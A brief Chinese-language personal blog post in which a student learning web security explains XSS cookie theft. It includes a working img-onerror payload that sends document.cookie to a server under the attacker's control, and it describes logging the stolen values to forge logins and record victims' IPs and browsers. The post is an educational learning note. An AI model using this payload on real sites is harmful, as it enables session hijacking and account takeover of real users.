在今年的5月16号我注册了乌云账号。
虽然只是有一个账号但是也是让我高兴了一段很长的时间 自己还没有开始学习web安全渗透方面的。 我想也许会在大三的下学期学习。 近来还是先学习web方面的开发。毕竟不能半桶水的! 学习效率缓慢,时间堆上了,可知识跟不上来,让我不禁神伤。
别的先不说了。
今天说一下XSS 的shell 一般我们挖到了一个xss漏洞。 可以获得当前用户的cookie document.cookie cookie的获得我们还可以构造出一个对自己所能控制的服务器(自己能够操作的,有权限的)的get请求 例如发现了一个简单的xss漏洞 <img src=1 onerror="this.src='www.kang.com/xxx.php?a='+document.cookie"> 我们通过对我们可控的服务器的xxx.php发送一个get请求,a为get参数。当前网站的document.cookie被 我们当成请求的值传递过去 在xxx.php 我们只要监控$_GET['a'] 将每一个$_GET['a'] 的值记录下来。我们就可以得到受害者的cookie进行伪造登录等等 就此我们还可以进行很多操作。比如记录受害人的ip地址浏览器版本都是可以的 思路要大一些 附上乌云以为大牛的xss渗透教程 http://wooyun.org/whitehats/%E5%BF%83%E4%BC%A4%E7%9A%84%E7%98%A6%E5%AD%90 just do it 加油努力整 学习效率高一些。再高一些